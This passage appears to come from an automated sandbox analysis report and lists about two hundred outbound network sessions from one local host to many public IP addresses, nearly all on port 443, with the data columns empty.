                                      15640192.168.2.1442402199.32.183.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15641192.168.2.1440784171.232.196.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15642192.168.2.144948281.72.58.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15643192.168.2.145138620.196.147.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15644192.168.2.1439068208.2.68.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15645192.168.2.144369051.210.109.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15646192.168.2.1436600120.9.92.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15647192.168.2.1454272137.98.253.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15648192.168.2.143913877.2.177.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15649192.168.2.143968650.69.213.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15650192.168.2.1435154212.58.34.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15651192.168.2.143424087.3.97.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15652192.168.2.1449546160.187.14.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15653192.168.2.1443280148.148.4.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15654192.168.2.144505052.176.170.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15655192.168.2.1445000128.235.6.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15656192.168.2.1442834210.34.18.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15657192.168.2.1451542153.228.60.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15658192.168.2.1441010185.141.37.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15659192.168.2.1434194153.14.200.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15660192.168.2.1435098205.16.245.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15661192.168.2.1459414148.18.33.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15662192.168.2.1437436139.222.144.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15663192.168.2.1456494121.248.157.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15664192.168.2.1458422114.80.137.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15665192.168.2.1455884155.21.22.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15666192.168.2.1434696191.203.39.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15667192.168.2.143708461.93.207.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15668192.168.2.143882035.64.7.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15669192.168.2.14479421.68.213.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15670192.168.2.1440576195.16.209.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15671192.168.2.143757843.148.184.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15672192.168.2.1437934147.167.167.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15673192.168.2.1437470189.239.255.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15674192.168.2.144774476.177.241.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15675192.168.2.1448858176.210.197.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15676192.168.2.146046852.57.104.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15677192.168.2.1435754148.231.219.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15678192.168.2.1457316133.158.171.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15679192.168.2.1440864162.205.30.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15680192.168.2.1448770104.226.75.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15681192.168.2.1448472179.180.141.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15682192.168.2.145445438.249.211.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15683192.168.2.144369477.11.119.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15684192.168.2.143850647.73.7.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15685192.168.2.1454496126.104.190.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15686192.168.2.143402269.153.49.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15687192.168.2.143510868.112.31.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15688192.168.2.145962482.72.224.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15689192.168.2.1454928206.250.162.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15690192.168.2.1447170130.134.236.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15691192.168.2.1450906218.13.98.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15692192.168.2.145025891.67.214.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15693192.168.2.1443936115.130.193.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15694192.168.2.144352642.41.209.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15695192.168.2.143764024.135.105.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15696192.168.2.1435274122.107.88.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15697192.168.2.1460518156.44.41.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15698192.168.2.1457614129.155.210.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15699192.168.2.1440784195.25.120.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15700192.168.2.1433930182.41.121.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15701192.168.2.14408605.65.100.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15702192.168.2.1459242207.109.86.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15703192.168.2.1445602106.178.229.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15704192.168.2.143410068.28.140.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15705192.168.2.1460286102.17.195.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15706192.168.2.1439246178.122.65.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15707192.168.2.1437624222.61.185.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15708192.168.2.1454730213.214.224.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15709192.168.2.1447214128.122.106.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15710192.168.2.143808899.217.191.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15711192.168.2.1438270140.177.195.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15712192.168.2.1442396175.102.164.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15713192.168.2.143620670.142.167.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15714192.168.2.1439304212.90.141.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15715192.168.2.1438262126.185.54.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15716192.168.2.144341874.236.224.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15717192.168.2.1451652195.252.88.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15718192.168.2.145078660.102.102.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15719192.168.2.145742458.232.23.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15720192.168.2.1453226166.49.245.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15721192.168.2.1457728208.52.4.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15722192.168.2.1433170152.246.107.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15723192.168.2.1440094205.117.123.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15724192.168.2.1448788187.8.64.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15725192.168.2.145569652.151.144.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15726192.168.2.1432818170.30.166.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15727192.168.2.1448976166.44.223.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15728192.168.2.144841269.196.18.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15729192.168.2.1460370123.192.134.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15730192.168.2.1433710186.155.204.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15731192.168.2.1457928134.146.65.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15732192.168.2.144322424.74.84.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15733192.168.2.144627423.172.58.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15734192.168.2.143774286.85.206.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15735192.168.2.14409909.254.95.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15736192.168.2.1442986188.134.81.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15737192.168.2.144085431.166.133.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15738192.168.2.1446514158.88.62.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15739192.168.2.1448212182.6.243.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15740192.168.2.1445780136.15.242.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15741192.168.2.1436938122.176.30.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15742192.168.2.1460314106.167.119.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15743192.168.2.1445872176.243.114.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15744192.168.2.1441658111.77.28.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15745192.168.2.144660843.168.198.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15746192.168.2.143750444.69.217.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15747192.168.2.1444384173.188.216.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15748192.168.2.1437044165.188.16.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15749192.168.2.143636481.181.33.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15750192.168.2.1444876187.162.119.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15751192.168.2.144993644.150.15.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15752192.168.2.145465499.163.238.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15753192.168.2.144655434.237.62.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15754192.168.2.143698242.161.105.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15755192.168.2.1453924119.105.46.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15756192.168.2.1450940174.23.139.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15757192.168.2.144376246.28.241.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15758192.168.2.143310886.125.28.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15759192.168.2.1443726172.154.144.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15760192.168.2.143703265.211.1.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15761192.168.2.1437328219.141.93.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15762192.168.2.1446788120.20.19.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15763192.168.2.145006867.118.128.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15764192.168.2.1444182174.73.240.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15765192.168.2.1457916199.26.195.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15766192.168.2.1436908101.84.18.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15767192.168.2.1453996175.0.197.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15768192.168.2.1459890195.151.213.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15769192.168.2.1447672172.145.165.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15770192.168.2.144688653.22.173.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15771192.168.2.143475642.246.163.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15772192.168.2.1436870207.60.86.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15773192.168.2.145947453.241.202.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15774192.168.2.1434066170.171.75.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15775192.168.2.145710696.218.228.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15776192.168.2.143952661.28.161.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15777192.168.2.1456864110.21.147.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15778192.168.2.1454422202.44.83.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15779192.168.2.1444108149.143.90.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15780192.168.2.144486227.169.98.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15781192.168.2.1450190142.23.217.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15782192.168.2.1453128138.69.54.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15783192.168.2.145978036.194.178.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15784192.168.2.1450994158.136.134.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15785192.168.2.145538093.214.114.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15786192.168.2.14375765.110.5.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15787192.168.2.1449800206.15.109.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15788192.168.2.1449080163.18.29.14837215
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15789192.168.2.1456896203.48.28.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15790192.168.2.144019093.194.42.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15791192.168.2.1456942159.158.4.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15792192.168.2.1453674125.5.135.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15793192.168.2.1443636166.226.182.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15794192.168.2.1457692160.174.167.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15795192.168.2.144107293.155.12.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15796192.168.2.1450406126.140.161.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15797192.168.2.1453696118.73.37.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15798192.168.2.144958092.247.113.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15799192.168.2.1448388112.227.118.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15800192.168.2.1442562153.224.110.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15801192.168.2.144712235.160.60.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15802192.168.2.143307057.56.104.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15803192.168.2.145150641.59.208.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15804192.168.2.146038663.208.236.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15805192.168.2.143736292.113.27.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15806192.168.2.144616451.191.232.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15807192.168.2.1453736186.86.47.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15808192.168.2.1448464210.151.167.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15809192.168.2.1444452211.116.102.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15810192.168.2.145314082.177.151.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15811192.168.2.143526442.94.250.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15812192.168.2.143822048.70.224.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15813192.168.2.1458010158.60.16.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15814192.168.2.1439896201.114.67.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15815192.168.2.1451304106.247.207.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15816192.168.2.1460058117.86.68.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15817192.168.2.1439402138.171.108.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15818192.168.2.143349627.33.23.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15819192.168.2.143340278.35.47.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15820192.168.2.146030854.0.110.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15821192.168.2.144714691.220.222.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15822192.168.2.145003212.150.206.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15823192.168.2.1437728195.128.226.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15824192.168.2.143766087.129.110.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15825192.168.2.14592389.243.219.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15826192.168.2.1456668181.102.159.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15827192.168.2.145292627.182.181.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15828192.168.2.145095853.26.15.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15829192.168.2.1455838111.74.69.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15830192.168.2.1460572200.145.171.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15831192.168.2.145999638.128.112.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15832192.168.2.1439438152.163.246.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15833192.168.2.145480647.90.231.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15834192.168.2.145974624.208.56.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15835192.168.2.144434447.254.254.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15836192.168.2.1433840117.160.73.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15837192.168.2.1436434113.139.33.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15838192.168.2.1439872110.149.115.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15839192.168.2.145045489.195.41.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15840192.168.2.1452088117.119.14.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15841192.168.2.1434080155.138.167.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15842192.168.2.144187643.124.114.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15843192.168.2.144533277.214.235.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15844192.168.2.1437436115.205.46.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15845192.168.2.1436426147.9.164.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15846192.168.2.1455448169.206.223.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15847192.168.2.1433394186.153.150.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15848192.168.2.144614279.131.43.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15849192.168.2.1457172114.42.240.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15850192.168.2.1450006114.210.133.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15851192.168.2.143967039.52.44.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15852192.168.2.144419283.62.194.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15853192.168.2.1456414176.129.20.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15854192.168.2.144981681.175.247.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15855192.168.2.1457344120.32.58.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15856192.168.2.144985864.142.131.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15857192.168.2.1447894136.117.140.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15858192.168.2.145044040.53.29.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15859192.168.2.1448494163.235.231.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15860192.168.2.145453263.225.85.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15861192.168.2.1454276115.61.36.26443
                                      TimestampBytes transferredDirectionData


